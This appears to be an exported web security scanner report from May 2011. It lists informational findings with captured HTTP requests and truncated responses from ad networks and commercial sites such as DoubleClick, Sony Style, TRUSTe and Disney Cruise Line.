HTTP/1.1 200 OK Server: nginx Date: Sun, 15 May 2011 20:29:54 GMT Content-Type: text/html; charset=UTF-8 Cneonction: close Vary: Cookie Last-Modified: Sun, 15 May 2011 20:27:46 +0000 Cache-Control: max-age=172, must-revalidate X-Pingback: http://blog.us.plays Link: <http://blog.us X-hax0r: sean at voce connect Content-Length: 82583 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="email-form"> <form action="http://www <h2> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.mcafeesecure |
Path: | /RatingVerify |
GET /RatingVerify?ref=www Host: www.mcafeesecure.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 200 OK Server: McAfeeSecure Vary: Accept-Encoding Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Set-Cookie: CAMEFROM=www.fingerhut Content-Type: text/html; charset=utf-8 Content-Length: 10809 Connection: close Date: Mon, 16 May 2011 01:37:34 GMT <html> <head> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='1568676568',d=document ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK ntCoent-Length: 4641 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 4641 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:22:00 GMT Connection: keep-alive Set-Cookie: WC_AUTHENTICATION Set-Cookie: TS5bbf46=59f0262ca39 Cache-Control: private Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta id="meta_refresh" ht ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad-emea.doubl |
Path: | /adj/tmg.telegraph |
GET /adj/tmg.telegraph Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 261 Date: Mon, 16 May 2011 01:27:15 GMT Cache-Control: private, x-gzip-ok="" document.write('<a target="_blank" href="http://ad-emea ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad-emea.doubl |
Path: | /adj/tmg.telegraph |
GET /adj/tmg.telegraph Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 261 Date: Mon, 16 May 2011 01:19:38 GMT Cache-Control: private, x-gzip-ok="" document.write('<a target="_blank" href="http://ad-emea ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3941.InviteMedia |
GET /adi/N3941.InviteMedia Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 8329 Date: Mon, 16 May 2011 01:27:08 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... <!-- Code auto-generated on Tue Mar 29 11:15:57 EDT 2011 --> <script src="http://s0.2mdn.net ...[SNIP]... erID=9&url=http%3A%2F ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4764.cruisecritic |
GET /adi/N4764.cruisecritic Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5433 Date: Mon, 16 May 2011 01:34:34 GMT Cache-Control: private, x-gzip-ok="" <html><head><title <table ...[SNIP]... Dv8/3b09/3/0/%2a/i ><img src="http://s0.2mdn.net ...[SNIP]... 8/3b09/3/0/%2a/i ><img src="http://s0.2mdn.net ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4975.1207 |
GET /adi/N4975.1207 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://dm.travelocity.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 1144 Date: Mon, 16 May 2011 01:29:31 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... s/0%2C%2CTRAVELOCITY ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N5823.DbclkAdEx |
GET /adi/N5823.DbclkAdEx Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 1281 Date: Mon, 16 May 2011 01:41:13 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/ta.cc.com.s/deals |
GET /adi/ta.cc.com.s/deals Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 845 Date: Mon, 16 May 2011 01:28:13 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 8363 Template Name = TA - Marketing - Gif/J ...[SNIP]... h%3Dv8/3b09/3/0/%2a/o <img src="http://s0.2mdn.net ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/ta.cc.com.s/deals |
GET /adi/ta.cc.com.s/deals Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 569 Date: Mon, 16 May 2011 01:28:08 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad ...[SNIP]... 1085447;0-0;1;31122603 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/ta.cc.com.s/deals |
GET /adi/ta.cc.com.s/deals Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 473 Date: Mon, 16 May 2011 01:34:07 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/ta.cc.com.s/disney |
GET /adi/ta.cc.com.s/disney Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 588 Date: Mon, 16 May 2011 01:20:34 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad ...[SNIP]... 60/600;41939757/41957544 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/ta.cc.com.s/disney |
GET /adi/ta.cc.com.s/disney Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4789 Date: Mon, 16 May 2011 01:20:34 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2594 Template Name = Banner Creative (Flash ...[SNIP]... <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net ...[SNIP]... %3Bh%3Dv8/3b09/3/0/%2a/d ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/ta.cc.com.s/disney |
GET /adi/ta.cc.com.s/disney Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 473 Date: Mon, 16 May 2011 01:29:54 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.dt/dt |
GET /adi/x1.dt/dt;sz=1x1;ord Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 371 Date: Mon, 16 May 2011 01:24:40 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bn.xp1.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 1173 Date: Mon, 16 May 2011 01:23:57 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4439 Template Name = Image Banner - Open in ...[SNIP]... com/user/start_credit_app <img width="728" height="90" border="0" src="http://s0.2mdn.net </a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/ads.js |
GET /server/ads.js?pub Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: public Cache-Control: max-age=172800 Cache-Control: must-revalidate Expires: Wed, 18 May 2011 01:40:38 GMT Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/ Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: adImpCount=z8H5DIFkJ Set-Cookie: fc=VBzn51JQz0zltCfNS Set-Cookie: pf=_ueUnCc1-Qecqj3JV Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Mon, 16 May 2011 01:40:38 GMT Content-Length: 11133 var detect = navigator.userAgent function checkIt(string) { return detect.indexOf(string) >= 0; } var naturalImages = new Array; naturalImageOnLoad = function() { if (this.width ...[SNIP]... oncept.util.getReque document.write('\n\n\n \n\n \n \n \n \n \n\n\n\n\n\n\n \n \n \n \n \n \n \n <IFRAME SRC="http://ad.doubl ...[SNIP]... DAGiWqtycjJBgtabbvXc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://adadvisor.net |
Path: | /adscores/g.js |
GET /adscores/g.js?sid Host: adadvisor.net Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:20:09 GMT Connection: close Server: AAWebServer P3P: policyref="http://www Content-Length: 258 Content-Type: application/javascript document.write('<img src="http://d.turn.com/r |
Severity: | Information |
Confidence: | Certain |
Host: | http://admeld.adnxs.com |
Path: | /usersync |
GET /usersync?calltype=admeld Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anj=Kfu=8fG5+^Cxrx)0s]# |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:22:39 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=3420415245200633085 Content-Type: application/x-javascript Date: Mon, 16 May 2011 01:22:39 GMT Content-Length: 155 document.write('<img src="http://tag.admeld |
Severity: | Information |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /bh/drts |
GET /bh/drts?Rand=382861388 HTTP/1.1 Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 Cache-Control: private, max-age=0, no-cache, no-store Expires: -1 Content-Type: text/html;charset=ISO Date: Mon, 16 May 2011 01:25:58 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 164 <html> <body> <img src='http://tag.admeld </body> </html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://bp.specificclick |
Path: | / |
GET /?pixid=99007235 HTTP/1.1 Host: bp.specificclick.net Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ug=FiMiv7kDK4v9CD |
HTTP/1.1 302 Moved Temporarily Server: WebStar 1.0 Cache-Control: no-store,no-cache,must Pragma: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Location: http://ad.doubleclick.net Content-Type: text/html;charset=ISO Content-Language: en-US Content-Length: 225 Date: Mon, 16 May 2011 01:40:51 GMT <html> <head><title>Document moved</title></head> <body><h1>Document moved</h1> This document has moved <a href="http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att01 Host: choices.truste.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/5 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:18:54 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4471 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... <hr /> \ <a href="http://bit.ly ...[SNIP]... <hr />\ <a href="http://bit.ly ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://cm.g.doubleclick |
Path: | /pixel |
GET /pixel?nid=xplusone1&_r=1 HTTP/1.1 Host: cm.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://d.xp1.ru4.com/meta User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Found Location: http://d.xp1.ru4.com/um? Cache-Control: no-store, no-cache Pragma: no-cache Date: Mon, 16 May 2011 01:19:55 GMT Content-Type: text/html; charset=UTF-8 Server: Cookie Matcher Content-Length: 306 X-XSS-Protection: 1; mode=block <HTML><HEAD><meta http-equiv="content-type" content="text/html <TITLE>302 Moved</TITLE></HEAD><BODY <H1>302 Moved</H1> The document has moved <A HREF="http://d.xp1.ru4 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://cm.g.doubleclick |
Path: | /pixel |
GET /pixel?nid=rfi&forward Host: cm.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 403 Forbidden Content-Length: 1207 Content-Type: text/html Date: Mon, 16 May 2011 01:43:02 GMT Server: GFE/2.0 <html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"/><title ...[SNIP]... <div style="margin-left: 4em;">See <a href="http://www.google ...[SNIP]... <div style="text-align: center; border-top: 1px solid #dfdfdf;">© 2009 Google - <a href="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://cm.g.doubleclick |
Path: | /pixel |
GET /pixel?nid=turn1 HTTP/1.1 Host: cm.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Found Location: http://r.turn.com/r/bd Cache-Control: no-store, no-cache Pragma: no-cache Date: Mon, 16 May 2011 01:24:51 GMT Content-Type: text/html; charset=UTF-8 Server: Cookie Matcher Content-Length: 283 X-XSS-Protection: 1; mode=block <HTML><HEAD><meta http-equiv="content-type" content="text/html <TITLE>302 Moved</TITLE></HEAD><BODY <H1>302 Moved</H1> The document has moved <A HREF="http://r.turn.com/r ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://cm.g.doubleclick |
Path: | /pixel |
GET /pixel?nid=audsci HTTP/1.1 Host: cm.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Found Location: http://pix04.revsci.net Cache-Control: no-store, no-cache Pragma: no-cache Date: Mon, 16 May 2011 01:20:17 GMT Content-Type: text/html; charset=UTF-8 Server: Cookie Matcher Content-Length: 341 X-XSS-Protection: 1; mode=block <HTML><HEAD><meta http-equiv="content-type" content="text/html <TITLE>302 Moved</TITLE></HEAD><BODY <H1>302 Moved</H1> The document has moved <A HREF="http://pix04.revsci ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://cplads.appspot.com |
Path: | /ad_tag/three_pas |
GET /ad_tag/three_pas Host: cplads.appspot.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 May 2011 01:24:45 GMT Server: Google Frontend Content-Length: 125 <script language="javascript" src="http://www.inadcoads |
Severity: | Information |
Confidence: | Certain |
Host: | http://disneycruise |
Path: | /reservations/customize |
GET /reservations/customize Host: disneycruise.disney.go Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=854018943 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:41 GMT Set-Cookie: DCL_POOL=1;path=/; Set-Cookie: dcl_i_persistence=H Content-Length: 63930 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... </title> <link href="http://dcl <link rel="canonical" href="http://disneycruise <link href="http://dcl <link href="http://dcl <!--[if lte IE 6]> ...[SNIP]... </script> <script src="http://dcl2 <script src="http://dcl <script src="http://dcl2 <script src="http://dcl <script src="http://dcl2 <link href="http://dcl2 </head> ...[SNIP]... <div class="grid"> <img height="66" width="505" title="Disney Cruise Lines" alt="Disney Cruise Lines Logo" src="http://dcl2 <div id="loginRegForm" class="yui-navset"> ...[SNIP]... <a href="/"><img alt="Disney Cruise Line" height="78" id="GlobalHeaderLogo ...[SNIP]... <div id="SearchResults ...[SNIP]... <li><a href="http://disneys ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.dclnews ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://aimg ...[SNIP]... <li><a href="http://www.facebook ...[SNIP]... <li><a href="http://twitter.com <li><a href="http://www.youtube ...[SNIP]... </div> <script src="http://dcl2 <script src="http://dcl ...[SNIP]... <noscript> <iframe src="//fls.doubleclick ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://f.nexac.com |
Path: | /e/a-677/s-2140.xgi |
